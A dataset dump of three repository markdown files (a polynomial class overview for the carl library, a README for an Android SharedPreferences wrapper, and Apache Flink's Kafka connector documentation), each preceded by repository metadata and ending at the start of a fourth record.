e03aa309b9960c6c4957de6307c3c6f379576aa7 | 1,241 | md | Markdown | doc/markdown/users/polynomials.md | smtrat/carl-windows | 22b3a7677477cdbed9adc7619479ce82a0304666 | [
"MIT"
] | 29 | 2015-05-19T12:17:16.000Z | 2021-03-05T17:53:00.000Z | doc/markdown/users/polynomials.md | smtrat/carl-windows | 22b3a7677477cdbed9adc7619479ce82a0304666 | [
"MIT"
] | 36 | 2016-10-26T12:47:11.000Z | 2021-03-03T15:19:38.000Z | doc/markdown/users/polynomials.md | smtrat/carl-windows | 22b3a7677477cdbed9adc7619479ce82a0304666 | [
"MIT"
] | 16 | 2015-05-27T07:35:19.000Z | 2021-03-05T17:53:08.000Z | Polynomials {#polynomials}
=====
In order to represent polynomials, we define the following hierarchy of classes:
- Coefficient: Represents the numeric coefficient..
- Variable: Represents a variable.
- Monomial: Represents a product of variables.
- Term: Represents a product of a constant factor and a Monomial.
- MultivariatePolynomial: Represents a polynomial in multiple variables with numeric coefficients.
We consider these types to be embedded in a hierarchy like this:
- MultivariatePolynomial
- Term
- Monomial
- Variable
- Coefficient
We will abbreviate these types as C, V, M, T, MP.
## UnivariatePolynomial
Additionally, we define a UnivariatePolynomial class.
It is meant to represent either a univariate polynomial in a single variable, or a multivariate polynomial with a distinguished main variable.
In the former case, a number type is used as template argument. We call this a _univariate polynomial_.
In the latter case, the template argument is instantiated with a multivariate polynomial. We call this a _univariately represented polynomial_.
A UnivariatePolynomial, regardless if univariate or univariately represented, is mostly compatible to the above types.
@subpage polynomials_operators
| 37.606061 | 143 | 0.796132 | eng_Latn | 0.995279 |
e03ac236af5aed98b62d864c3267e437ac5a4e61 | 1,603 | md | Markdown | README.md | rogerp91/Prefs | ce9f912044cddce87c17d530cad84b8320b1e08e | [
"Apache-2.0"
] | null | null | null | README.md | rogerp91/Prefs | ce9f912044cddce87c17d530cad84b8320b1e08e | [
"Apache-2.0"
] | null | null | null | README.md | rogerp91/Prefs | ce9f912044cddce87c17d530cad84b8320b1e08e | [
"Apache-2.0"
] | 1 | 2017-03-05T09:12:48.000Z | 2017-03-05T09:12:48.000Z | # Prefs
SharedPreferences in Android
```Java
public class PrefsApplication extends Application {
@Override
public void onCreate() {
super.onCreate();
// Initialize the Prefs class
new ManagerPrefs.Builder()
.setContext(this)
.setMode(ContextWrapper.MODE_PRIVATE)
.setPrefsName(getPackageName())
.setUseDefaultSharedPreference(true).build();
}
}
```
# Usage
After initialization, you can use simple one-line methods to save values to the shared preferences anywhere in your app, such as:
- `Prefs.putString(key, string)`
- `Prefs.putLong(key, long)`
- `Prefs.putBoolean(key, boolean)`
https://jitpack.io
Add it to your build.gradle with:
```gradle
allprojects {
repositories {
maven { url "https://jitpack.io" }
}
}
```
and:
```gradle
dependencies {
compile 'com.github.rogerp91:prefs-shared:{latest version}'
}
```
### Based
- [EasyPreferences](https://github.com/Pixplicity/EasyPreferences)
### License
Copyright 2016 Roger Patiño
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
| 25.046875 | 129 | 0.697442 | eng_Latn | 0.902025 |
e03aeb5f97cd38403e6c2f7382bdb13e647c655f | 30,392 | md | Markdown | docs/dev/connectors/kafka.md | mnmhouse/flink | 8b05cbee4425c5ee33d73bed1473e075d7e17387 | [
"Apache-2.0"
] | 41 | 2018-11-14T04:05:42.000Z | 2022-02-09T10:39:23.000Z | docs/dev/connectors/kafka.md | mnmhouse/flink | 8b05cbee4425c5ee33d73bed1473e075d7e17387 | [
"Apache-2.0"
] | 4 | 2019-10-28T02:01:27.000Z | 2020-12-10T06:50:54.000Z | docs/dev/connectors/kafka.md | fantasticKe/flink | c42ad0fcbcd5f2666952ee3fc4763490915091f6 | [
"Apache-2.0"
] | 16 | 2019-01-04T09:19:03.000Z | 2022-01-10T14:34:31.000Z | ---
title: "Apache Kafka Connector"
nav-title: Kafka
nav-parent_id: connectors
nav-pos: 1
---
<!--
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
-->
Flink provides an [Apache Kafka](https://kafka.apache.org) connector for reading data from and writing data to Kafka topics with exactly-once guarantees.
* This will be replaced by the TOC
{:toc}
## Dependency
Apache Flink ships with a universal Kafka connector which attempts to track the latest version of the Kafka client.
The version of the client it uses may change between Flink releases.
Modern Kafka clients are backwards compatible with broker versions 0.10.0 or later.
For details on Kafka compatibility, please refer to the official [Kafka documentation](https://kafka.apache.org/protocol.html#protocol_compatibility).
<div class="codetabs" markdown="1">
<div data-lang="universal" markdown="1">
{% highlight xml %}
<dependency>
<groupId>org.apache.flink</groupId>
<artifactId>flink-connector-kafka{{ site.scala_version_suffix }}</artifactId>
<version>{{ site.version }}</version>
</dependency>
{% endhighlight %}
</div>
</div>
Flink's streaming connectors are not currently part of the binary distribution.
See how to link with them for cluster execution [here]({% link dev/project-configuration.md %}).
## Kafka Consumer
Flink's Kafka consumer - `FlinkKafkaConsumer` provides access to read from one or more Kafka topics.
The constructor accepts the following arguments:
1. The topic name / list of topic names
2. A DeserializationSchema / KafkaDeserializationSchema for deserializing the data from Kafka
3. Properties for the Kafka consumer.
The following properties are required:
- "bootstrap.servers" (comma separated list of Kafka brokers)
- "group.id" the id of the consumer group
<div class="codetabs" markdown="1">
<div data-lang="java" markdown="1">
{% highlight java %}
Properties properties = new Properties();
properties.setProperty("bootstrap.servers", "localhost:9092");
properties.setProperty("group.id", "test");
DataStream<String> stream = env
.addSource(new FlinkKafkaConsumer<>("topic", new SimpleStringSchema(), properties));
{% endhighlight %}
</div>
<div data-lang="scala" markdown="1">
{% highlight scala %}
val properties = new Properties()
properties.setProperty("bootstrap.servers", "localhost:9092")
properties.setProperty("group.id", "test")
val stream = env
.addSource(new FlinkKafkaConsumer[String]("topic", new SimpleStringSchema(), properties))
{% endhighlight %}
</div>
</div>
### The `DeserializationSchema`
The Flink Kafka Consumer needs to know how to turn the binary data in Kafka into Java/Scala objects.
The `KafkaDeserializationSchema` allows users to specify such a schema. The `T deserialize(ConsumerRecord<byte[], byte[]> record)` method gets called for each Kafka message, passing the value from Kafka.
For convenience, Flink provides the following schemas out of the box:
1. `TypeInformationSerializationSchema` (and `TypeInformationKeyValueSerializationSchema`) which creates
a schema based on a Flink's `TypeInformation`. This is useful if the data is both written and read by Flink.
This schema is a performant Flink-specific alternative to other generic serialization approaches.
2. `JsonDeserializationSchema` (and `JSONKeyValueDeserializationSchema`) which turns the serialized JSON
into an ObjectNode object, from which fields can be accessed using `objectNode.get("field").as(Int/String/...)()`.
The KeyValue objectNode contains a "key" and "value" field which contain all fields, as well as
an optional "metadata" field that exposes the offset/partition/topic for this message.
3. `AvroDeserializationSchema` which reads data serialized with Avro format using a statically provided schema. It can
infer the schema from Avro generated classes (`AvroDeserializationSchema.forSpecific(...)`) or it can work with `GenericRecords`
with a manually provided schema (with `AvroDeserializationSchema.forGeneric(...)`). This deserialization schema expects that
the serialized records DO NOT contain embedded schema.
- There is also a version of this schema available that can lookup the writer's schema (schema which was used to write the record) in
[Confluent Schema Registry](https://docs.confluent.io/current/schema-registry/docs/index.html). Using these deserialization schema
record will be read with the schema that was retrieved from Schema Registry and transformed to a statically provided( either through
`ConfluentRegistryAvroDeserializationSchema.forGeneric(...)` or `ConfluentRegistryAvroDeserializationSchema.forSpecific(...)`).
<br>To use this deserialization schema one has to add the following additional dependency:
<div class="codetabs" markdown="1">
<div data-lang="AvroDeserializationSchema" markdown="1">
{% highlight xml %}
<dependency>
<groupId>org.apache.flink</groupId>
<artifactId>flink-avro</artifactId>
<version>{{site.version }}</version>
</dependency>
{% endhighlight %}
</div>
<div data-lang="ConfluentRegistryAvroDeserializationSchema" markdown="1">
{% highlight xml %}
<dependency>
<groupId>org.apache.flink</groupId>
<artifactId>flink-avro-confluent-registry</artifactId>
<version>{{site.version }}</version>
</dependency>
{% endhighlight %}
</div>
</div>
When encountering a corrupted message that cannot be deserialized for any reason the deserialization schema should return null which will result in the record being skipped.
Due to the consumer's fault tolerance (see below sections for more details), failing the job on the corrupted message will let the consumer attempt to deserialize the message again.
Therefore, if deserialization still fails, the consumer will fall into a non-stop restart and fail loop on that corrupted message.
### Kafka Consumers Start Position Configuration
The Flink Kafka Consumer allows configuring how the start positions for Kafka partitions are determined.
<div class="codetabs" markdown="1">
<div data-lang="java" markdown="1">
{% highlight java %}
final StreamExecutionEnvironment env = StreamExecutionEnvironment.getExecutionEnvironment();
FlinkKafkaConsumer<String> myConsumer = new FlinkKafkaConsumer<>(...);
myConsumer.setStartFromEarliest(); // start from the earliest record possible
myConsumer.setStartFromLatest(); // start from the latest record
myConsumer.setStartFromTimestamp(...); // start from specified epoch timestamp (milliseconds)
myConsumer.setStartFromGroupOffsets(); // the default behaviour
DataStream<String> stream = env.addSource(myConsumer);
...
{% endhighlight %}
</div>
<div data-lang="scala" markdown="1">
{% highlight scala %}
val env = StreamExecutionEnvironment.getExecutionEnvironment()
val myConsumer = new FlinkKafkaConsumer[String](...)
myConsumer.setStartFromEarliest() // start from the earliest record possible
myConsumer.setStartFromLatest() // start from the latest record
myConsumer.setStartFromTimestamp(...) // start from specified epoch timestamp (milliseconds)
myConsumer.setStartFromGroupOffsets() // the default behaviour
val stream = env.addSource(myConsumer)
...
{% endhighlight %}
</div>
</div>
All versions of the Flink Kafka Consumer have the above explicit configuration methods for start position.
* `setStartFromGroupOffsets` (default behaviour): Start reading partitions from
the consumer group's (`group.id` setting in the consumer properties) committed
offsets in Kafka brokers. If offsets could not be
found for a partition, the `auto.offset.reset` setting in the properties will be used.
* `setStartFromEarliest()` / `setStartFromLatest()`: Start from the earliest / latest
record. Under these modes, committed offsets in Kafka will be ignored and
not used as starting positions. If offsets become out of range for a partition,
the `auto.offset.reset` setting in the properties will be used.
* `setStartFromTimestamp(long)`: Start from the specified timestamp. For each partition, the record
whose timestamp is larger than or equal to the specified timestamp will be used as the start position.
If a partition's latest record is earlier than the timestamp, the partition will simply be read
from the latest record. Under this mode, committed offsets in Kafka will be ignored and not used as
starting positions.
You can also specify the exact offsets the consumer should start from for each partition:
<div class="codetabs" markdown="1">
<div data-lang="java" markdown="1">
{% highlight java %}
Map<KafkaTopicPartition, Long> specificStartOffsets = new HashMap<>();
specificStartOffsets.put(new KafkaTopicPartition("myTopic", 0), 23L);
specificStartOffsets.put(new KafkaTopicPartition("myTopic", 1), 31L);
specificStartOffsets.put(new KafkaTopicPartition("myTopic", 2), 43L);
myConsumer.setStartFromSpecificOffsets(specificStartOffsets);
{% endhighlight %}
</div>
<div data-lang="scala" markdown="1">
{% highlight scala %}
val specificStartOffsets = new java.util.HashMap[KafkaTopicPartition, java.lang.Long]()
specificStartOffsets.put(new KafkaTopicPartition("myTopic", 0), 23L)
specificStartOffsets.put(new KafkaTopicPartition("myTopic", 1), 31L)
specificStartOffsets.put(new KafkaTopicPartition("myTopic", 2), 43L)
myConsumer.setStartFromSpecificOffsets(specificStartOffsets)
{% endhighlight %}
</div>
</div>
The above example configures the consumer to start from the specified offsets for
partitions 0, 1, and 2 of topic `myTopic`. The offset values should be the
next record that the consumer should read for each partition. Note that
if the consumer needs to read a partition which does not have a specified
offset within the provided offsets map, it will fallback to the default
group offsets behaviour (i.e. `setStartFromGroupOffsets()`) for that
particular partition.
Note that these start position configuration methods do not affect the start position when the job is
automatically restored from a failure or manually restored using a savepoint.
On restore, the start position of each Kafka partition is determined by the
offsets stored in the savepoint or checkpoint
(please see the next section for information about checkpointing to enable
fault tolerance for the consumer).
### Kafka Consumers and Fault Tolerance
With Flink's checkpointing enabled, the Flink Kafka Consumer will consume records from a topic and periodically checkpoint all
its Kafka offsets, together with the state of other operations. In case of a job failure, Flink will restore
the streaming program to the state of the latest checkpoint and re-consume the records from Kafka, starting from the offsets that were
stored in the checkpoint.
The interval of drawing checkpoints therefore defines how much the program may have to go back at most, in case of a failure.
To use fault tolerant Kafka Consumers, checkpointing of the topology needs to be enabled in the [job]({% link deployment/config.md %}#execution-checkpointing-interval).
If checkpointing is disabled, the Kafka consumer will periodically commit the offsets to Zookeeper.
### Kafka Consumers Topic and Partition Discovery
#### Partition discovery
The Flink Kafka Consumer supports discovering dynamically created Kafka partitions, and consumes them with
exactly-once guarantees. All partitions discovered after the initial retrieval of partition metadata (i.e., when the
job starts running) will be consumed from the earliest possible offset.
By default, partition discovery is disabled. To enable it, set a non-negative value
for `flink.partition-discovery.interval-millis` in the provided properties config,
representing the discovery interval in milliseconds.
#### Topic discovery
The Kafka Consumer is also capable of discovering topics by matching topic names using regular expressions.
<div class="codetabs" markdown="1">
<div data-lang="java" markdown="1">
{% highlight java %}
final StreamExecutionEnvironment env = StreamExecutionEnvironment.getExecutionEnvironment();
Properties properties = new Properties();
properties.setProperty("bootstrap.servers", "localhost:9092");
properties.setProperty("group.id", "test");
FlinkKafkaConsumer<String> myConsumer = new FlinkKafkaConsumer<>(
java.util.regex.Pattern.compile("test-topic-[0-9]"),
new SimpleStringSchema(),
properties);
DataStream<String> stream = env.addSource(myConsumer);
...
{% endhighlight %}
</div>
<div data-lang="scala" markdown="1">
{% highlight scala %}
val env = StreamExecutionEnvironment.getExecutionEnvironment()
val properties = new Properties()
properties.setProperty("bootstrap.servers", "localhost:9092")
properties.setProperty("group.id", "test")
val myConsumer = new FlinkKafkaConsumer[String](
java.util.regex.Pattern.compile("test-topic-[0-9]"),
new SimpleStringSchema,
properties)
val stream = env.addSource(myConsumer)
...
{% endhighlight %}
</div>
</div>
In the above example, all topics with names that match the specified regular expression
(starting with `test-topic-` and ending with a single digit) will be subscribed by the consumer
when the job starts running.
To allow the consumer to discover dynamically created topics after the job started running,
set a non-negative value for `flink.partition-discovery.interval-millis`. This allows
the consumer to discover partitions of new topics with names that also match the specified
pattern.
### Kafka Consumers Offset Committing Behaviour Configuration
The Flink Kafka Consumer allows configuring the behaviour of how offsets
are committed back to Kafka brokers. Note that the
Flink Kafka Consumer does not rely on the committed offsets for fault
tolerance guarantees. The committed offsets are only a means to expose
the consumer's progress for monitoring purposes.
The way to configure offset commit behaviour is different, depending on
whether checkpointing is enabled for the job.
- *Checkpointing disabled:* if checkpointing is disabled, the Flink Kafka
Consumer relies on the automatic periodic offset committing capability
of the internally used Kafka clients. Therefore, to disable or enable offset
committing, simply set the `enable.auto.commit` / `auto.commit.interval.ms` keys to appropriate values
in the provided `Properties` configuration.
- *Checkpointing enabled:* if checkpointing is enabled, the Flink Kafka
Consumer will commit the offsets stored in the checkpointed states when
the checkpoints are completed. This ensures that the committed offsets
in Kafka brokers is consistent with the offsets in the checkpointed states.
Users can choose to disable or enable offset committing by calling the
`setCommitOffsetsOnCheckpoints(boolean)` method on the consumer (by default,
the behaviour is `true`).
Note that in this scenario, the automatic periodic offset committing
settings in `Properties` is completely ignored.
### Kafka Consumers and Timestamp Extraction/Watermark Emission
In many scenarios, the timestamp of a record is embedded in the record itself, or the metadata of the `ConsumerRecord`.
In addition, users may want to emit watermarks either periodically, or irregularly, e.g. based on
special records in the Kafka stream that contain the current event-time watermark. For these cases, the Flink Kafka
Consumer allows the specification of a [watermark strategy]({% link dev/event_time.md %}).
You can specify your custom strategy as described
[here]({% link dev/event_timestamps_watermarks.md %}), or use one from the
[predefined ones]({% link dev/event_timestamp_extractors.md %}).
<div class="codetabs" markdown="1">
<div data-lang="java" markdown="1">
{% highlight java %}
Properties properties = new Properties();
properties.setProperty("bootstrap.servers", "localhost:9092");
properties.setProperty("group.id", "test");
FlinkKafkaConsumer<String> myConsumer =
new FlinkKafkaConsumer<>("topic", new SimpleStringSchema(), properties);
myConsumer.assignTimestampsAndWatermarks(
WatermarkStrategy.
.forBoundedOutOfOrderness(Duration.ofSeconds(20)));
DataStream<String> stream = env.addSource(myConsumer);
{% endhighlight %}
</div>
<div data-lang="scala" markdown="1">
{% highlight scala %}
val properties = new Properties()
properties.setProperty("bootstrap.servers", "localhost:9092")
properties.setProperty("group.id", "test")
val myConsumer =
new FlinkKafkaConsumer("topic", new SimpleStringSchema(), properties);
myConsumer.assignTimestampsAndWatermarks(
WatermarkStrategy.
.forBoundedOutOfOrderness(Duration.ofSeconds(20)))
val stream = env.addSource(myConsumer)
{% endhighlight %}
</div>
</div>
**Note**: If a watermark assigner depends on records read from Kafka to advance its watermarks
(which is commonly the case), all topics and partitions need to have a continuous stream of records.
Otherwise, the watermarks of the whole application cannot advance and all time-based operations,
such as time windows or functions with timers, cannot make progress. A single idle Kafka partition causes this behavior.
Consider setting appropriate [idelness timeouts]({% link dev/event_timestamps_watermarks.md %}#dealing-with-idle-sources) to mitigate this issue.
## Kafka Producer
Flink’s Kafka Producer - `FlinkKafkaProducer` allows writing a stream of records to one or more Kafka topics.
The constructor accepts the following arguments:
1. A default output topic where events should be written
2. A SerializationSchema / KafkaSerializationSchema for serializing data into Kafka
3. Properties for the Kafka client. The following properties are required:
* "bootstrap.servers" (comma separated list of Kafka brokers)
4. A fault-tolerance semantic
<div class="codetabs" markdown="1">
<div data-lang="java" markdown="1">
{% highlight java %}
DataStream<String> stream = ...
Properties properties = new Properties();
properties.setProperty("bootstrap.servers", "localhost:9092");
FlinkKafkaProducer<String> myProducer = new FlinkKafkaProducer<>(
"my-topic", // target topic
new SimpleStringSchema(), // serialization schema
properties, // producer config
FlinkKafkaProducer.Semantic.EXACTLY_ONCE); // fault-tolerance
stream.addSink(myProducer);
{% endhighlight %}
</div>
<div data-lang="scala" markdown="1">
{% highlight scala %}
val stream: DataStream[String] = ...
val properties = new Properties
properties.setProperty("bootstrap.servers", "localhost:9092")
val myProducer = new FlinkKafkaProducer[String](
"my-topic", // target topic
new SimpleStringSchema(), // serialization schema
properties, // producer config
FlinkKafkaProducer.Semantic.EXACTLY_ONCE) // fault-tolerance
stream.addSink(myProducer)
{% endhighlight %}
</div>
</div>
## The `SerializationSchema`
The Flink Kafka Producer needs to know how to turn Java/Scala objects into binary data.
The `KafkaSerializationSchema` allows users to specify such a schema.
The `ProducerRecord<byte[], byte[]> serialize(T element, @Nullable Long timestamp)` method gets called for each record, generating a `ProducerRecord` that is written to Kafka.
The gives users fine-grained control over how data is written out to Kafka.
Through the producer record you can:
* Set header values
* Define keys for each record
* Specify custom partitioning of data
### Kafka Producers and Fault Tolerance
With Flink's checkpointing enabled, the `FlinkKafkaProducer` can provide
exactly-once delivery guarantees.
Besides enabling Flink's checkpointing, you can also choose three different modes of operating
chosen by passing appropriate `semantic` parameter to the `FlinkKafkaProducer`:
* `Semantic.NONE`: Flink will not guarantee anything. Produced records can be lost or they can
be duplicated.
* `Semantic.AT_LEAST_ONCE` (default setting): This guarantees that no records will be lost (although they can be duplicated).
* `Semantic.EXACTLY_ONCE`: Kafka transactions will be used to provide exactly-once semantic. Whenever you write
to Kafka using transactions, do not forget about setting desired `isolation.level` (`read_committed`
or `read_uncommitted` - the latter one is the default value) for any application consuming records
from Kafka.
##### Caveats
`Semantic.EXACTLY_ONCE` mode relies on the ability to commit transactions
that were started before taking a checkpoint, after recovering from the said checkpoint. If the time
between Flink application crash and completed restart is larger than Kafka's transaction timeout
there will be data loss (Kafka will automatically abort transactions that exceeded timeout time).
Having this in mind, please configure your transaction timeout appropriately to your expected down
times.
Kafka brokers by default have `transaction.max.timeout.ms` set to 15 minutes. This property will
not allow to set transaction timeouts for the producers larger than it's value.
`FlinkKafkaProducer` by default sets the `transaction.timeout.ms` property in producer config to
1 hour, thus `transaction.max.timeout.ms` should be increased before using the
`Semantic.EXACTLY_ONCE` mode.
In `read_committed` mode of `KafkaConsumer`, any transactions that were not finished
(neither aborted nor completed) will block all reads from the given Kafka topic past any
un-finished transaction. In other words after following sequence of events:
1. User started `transaction1` and written some records using it
2. User started `transaction2` and written some further records using it
3. User committed `transaction2`
Even if records from `transaction2` are already committed, they will not be visible to
the consumers until `transaction1` is committed or aborted. This has two implications:
* First of all, during normal working of Flink applications, user can expect a delay in visibility
of the records produced into Kafka topics, equal to average time between completed checkpoints.
* Secondly in case of Flink application failure, topics into which this application was writing,
will be blocked for the readers until the application restarts or the configured transaction
timeout time will pass. This remark only applies for the cases when there are multiple
agents/applications writing to the same Kafka topic.
**Note**: `Semantic.EXACTLY_ONCE` mode uses a fixed size pool of KafkaProducers
per each `FlinkKafkaProducer` instance. One of each of those producers is used per one
checkpoint. If the number of concurrent checkpoints exceeds the pool size, `FlinkKafkaProducer`
will throw an exception and will fail the whole application. Please configure max pool size and max
number of concurrent checkpoints accordingly.
**Note**: `Semantic.EXACTLY_ONCE` takes all possible measures to not leave any lingering transactions
that would block the consumers from reading from Kafka topic more then it is necessary. However in the
event of failure of Flink application before first checkpoint, after restarting such application there
is no information in the system about previous pool sizes. Thus it is unsafe to scale down Flink
application before first checkpoint completes, by factor larger than `FlinkKafkaProducer.SAFE_SCALE_DOWN_FACTOR`.
## Kafka Connector Metrics
Flink's Kafka connectors provide some metrics through Flink's [metrics system]({% link ops/metrics.md %}) to analyze
the behavior of the connector.
The producers export Kafka's internal metrics through Flink's metric system for all supported versions.
The Kafka documentation lists all exported metrics in its [documentation](http://kafka.apache.org/documentation/#selector_monitoring).
In addition to these metrics, all consumers expose the `current-offsets` and `committed-offsets` for each topic partition.
The `current-offsets` refers to the current offset in the partition. This refers to the offset of the last element that
we retrieved and emitted successfully. The `committed-offsets` is the last committed offset.
The Kafka Consumers in Flink commit the offsets back to the Kafka brokers.
If checkpointing is disabled, offsets are committed periodically.
With checkpointing, the commit happens once all operators in the streaming topology have confirmed that they've created a checkpoint of their state.
This provides users with at-least-once semantics for the offsets committed to Zookeeper or the broker. For offsets checkpointed to Flink, the system
provides exactly once guarantees.
The offsets committed to ZK or the broker can also be used to track the read progress of the Kafka consumer. The difference between
the committed offset and the most recent offset in each partition is called the *consumer lag*. If the Flink topology is consuming
the data slower from the topic than new data is added, the lag will increase and the consumer will fall behind.
For large production deployments we recommend monitoring that metric to avoid increasing latency.
## Enabling Kerberos Authentication
Flink provides first-class support through the Kafka connector to authenticate to a Kafka installation
configured for Kerberos. Simply configure Flink in `flink-conf.yaml` to enable Kerberos authentication for Kafka like so:
1. Configure Kerberos credentials by setting the following -
- `security.kerberos.login.use-ticket-cache`: By default, this is `true` and Flink will attempt to use Kerberos credentials in ticket caches managed by `kinit`.
Note that when using the Kafka connector in Flink jobs deployed on YARN, Kerberos authorization using ticket caches will not work.
This is also the case when deploying using Mesos, as authorization using ticket cache is not supported for Mesos deployments.
- `security.kerberos.login.keytab` and `security.kerberos.login.principal`: To use Kerberos keytabs instead, set values for both of these properties.
2. Append `KafkaClient` to `security.kerberos.login.contexts`: This tells Flink to provide the configured Kerberos credentials to the Kafka login context to be used for Kafka authentication.
Once Kerberos-based Flink security is enabled, you can authenticate to Kafka with either the Flink Kafka Consumer or Producer
by simply including the following two settings in the provided properties configuration that is passed to the internal Kafka client:
- Set `security.protocol` to `SASL_PLAINTEXT` (default `NONE`): The protocol used to communicate to Kafka brokers.
When using standalone Flink deployment, you can also use `SASL_SSL`; please see how to configure the Kafka client for SSL [here](https://kafka.apache.org/documentation/#security_configclients).
- Set `sasl.kerberos.service.name` to `kafka` (default `kafka`): The value for this should match the `sasl.kerberos.service.name` used for Kafka broker configurations.
A mismatch in service name between client and server configuration will cause the authentication to fail.
For more information on Flink configuration for Kerberos security, please see [here]({% link deployment/config.md %}).
You can also find [here]({% link deployment/security/security-kerberos.md %}) further details on how Flink internally setups Kerberos-based security.
## Upgrading to the Latest Connector Version
The generic upgrade steps are outlined in [upgrading jobs and Flink versions
guide]({% link ops/upgrading.md %}). For Kafka, you additionally need
to follow these steps:
* Do not upgrade Flink and the Kafka Connector version at the same time.
* Make sure you have a `group.id` configured for your Consumer.
* Set `setCommitOffsetsOnCheckpoints(true)` on the consumer so that read
offsets are committed to Kafka. It's important to do this before stopping and
taking the savepoint. You might have to do a stop/restart cycle on the old
connector version to enable this setting.
* Set `setStartFromGroupOffsets(true)` on the consumer so that we get read
offsets from Kafka. This will only take effect when there is no read offset
in Flink state, which is why the next step is very important.
* Change the assigned `uid` of your source/sink. This makes sure the new
source/sink doesn't read state from the old source/sink operators.
* Start the new job with `--allow-non-restored-state` because we still have the
state of the previous connector version in the savepoint.
## Troubleshooting
<div class="alert alert-warning">
If you have a problem with Kafka when using Flink, keep in mind that Flink only wraps
<a href="https://kafka.apache.org/documentation/#consumerapi">KafkaConsumer</a> or
<a href="https://kafka.apache.org/documentation/#producerapi">KafkaProducer</a>
and your problem might be independent of Flink and sometimes can be solved by upgrading Kafka brokers,
reconfiguring Kafka brokers or reconfiguring <tt>KafkaConsumer</tt> or <tt>KafkaProducer</tt> in Flink.
Some examples of common problems are listed below.
</div>
### Data loss
Depending on your Kafka configuration, even after Kafka acknowledges
writes you can still experience data loss. In particular keep in mind about the following properties
in Kafka config:
- `acks`
- `log.flush.interval.messages`
- `log.flush.interval.ms`
- `log.flush.*`
Default values for the above options can easily lead to data loss.
Please refer to the Kafka documentation for more explanation.
### UnknownTopicOrPartitionException
One possible cause of this error is when a new leader election is taking place,
for example after or during restarting a Kafka broker.
This is a retriable exception, so Flink job should be able to restart and resume normal operation.
It also can be circumvented by changing `retries` property in the producer settings.
However this might cause reordering of messages,
which in turn if undesired can be circumvented by setting `max.in.flight.requests.per.connection` to 1.
{% top %}
| 50.317881 | 203 | 0.785108 | eng_Latn | 0.992421 |
e03b0c36e4614f3b7de7b29382d4bf343abbb1f7 | 2,804 | md | Markdown | src/nl/2020-02/04/05.md | PrJared/sabbath-school-lessons | 94a27f5bcba987a11a698e5e0d4279b81a68bc9a | [
"MIT"
] | 68 | 2016-10-30T23:17:56.000Z | 2022-03-27T11:58:16.000Z | src/nl/2020-02/04/05.md | PrJared/sabbath-school-lessons | 94a27f5bcba987a11a698e5e0d4279b81a68bc9a | [
"MIT"
] | 367 | 2016-10-21T03:50:22.000Z | 2022-03-28T23:35:25.000Z | src/nl/2020-02/04/05.md | PrJared/sabbath-school-lessons | 94a27f5bcba987a11a698e5e0d4279b81a68bc9a | [
"MIT"
] | 109 | 2016-08-02T14:32:13.000Z | 2022-03-31T10:18:41.000Z | ---
title: Verstand
date: 22/04/2020
---
`Lees 2 Korintiërs 10:5-6; Spreuken 1:7; 9:10. Waarom wordt er zoveel nadruk gelegd op de gehoorzaamheid aan Christus in onze gedachten? Waarom is ontzag voor de HEER het begin van alle kennis?`
God stelt ons in staat na te denken en te redeneren. Elke activiteit en elk theologisch argument en ons vermogen conclusies te trekken gaat daar vanuit. Ons geloof is ook niet irrationeel. Na de periode van de Verlichting in de 18 e eeuw werd de menselijke rede met name in de westerse wereld dominant. Dat ging verder dan de mogelijkheid tot nadenken en tot de juiste conclusies komen. Tegenover het idee dat al onze kennis is gebaseerd op zintuiglijke waarnemingen, staat de andere zienswijze dat het menselijke verstand de voornaamste bron is van kennis. Dat is het rationalisme en dat beweert dat waarheid niet zintuiglijk maar intellectueel is en voortkomt uit de rede. Er zijn waarheden waar we alleen door ons verstand vat op krijgen. Zo wordt de menselijke rede de maatstaf voor wat waar is. Het verstand werd het nieuwe gezag waarvoor al het andere moest buigen, inclusief dat van de kerk en zelfs de Bijbel als Gods Woord. Alles werd verworpen wat de menselijke rede niet begreep, en de geldigheid werd in twijfel getrokken. Deze denkwijze heeft veel invloed gehad op grote delen van de Schrift. Alle wonderen en bovennatuurlijke daden van God, zoals de lichamelijke opstanding van Jezus, de maagdelijke geboorte, de schepping in zes dagen, werden niet langer voor betrouwbaar en waar aangenomen.
We moeten bedenken dat zelfs ons vermogen tot redeneren is aangetast door de zonde en dus onder de heerschappij van Christus moet worden gebracht. Het begrip van mensen is verduisterd en ze zijn vervreemd van God. Gods Woord moet ons verlichten. Het feit dat God onze Schepper is wijst er daarbij ook op dat ons menselijk verstand vanuit Bijbels oogpunt niet is geschapen als iets dat onafhankelijk van God functioneert. Het is veel eerder zo: ‘het ontzag voor de HEER is het begin van alle kennis’ (Spreuken 9:10, vergelijk met Spreuken 1:7). Als we Gods openbaring, zoals deze vorm heeft gekregen in het geschreven Woord van God, de hoogste eer toekennen en bereid zijn wat in de Bijbel staat geschreven na te volgen, alleen dan zijn we in staat ons verstand op de juiste manier te gebruiken.
`Eeuwen geleden maakte de Amerikaanse president Thomas Jefferson zijn eigen versie van het Nieuwe Testament. Hij haalde alles eruit wat naar zijn idee inging tegen de menselijke rede. Bijna alle wonderen van Jezus werden geëlimineerd, inclusief zijn opstanding. Wat kunnen we uit dit voorbeeld leren over de begrensdheid van het menselijke verstand om de waarheid te vatten?`
`2 Korintiërs 10:5-6; Spreuken 1:7; 9:10 Wat is het begin van kennis & wijsheid?`
| 186.933333 | 1,306 | 0.805278 | nld_Latn | 1.000005 |
e03b0c6c4c503061f0a528d925f4f22d2aed5818 | 4,941 | md | Markdown | CHANGELOG.md | DeAccountSystems/das-sdk-js | 465c37b9bb3725e7f6480cec2f7b24ba1bbbd454 | [
"MIT"
] | 7 | 2021-07-24T02:06:52.000Z | 2022-01-04T17:45:28.000Z | CHANGELOG.md | DeAccountSystems/das-sdk-js | 465c37b9bb3725e7f6480cec2f7b24ba1bbbd454 | [
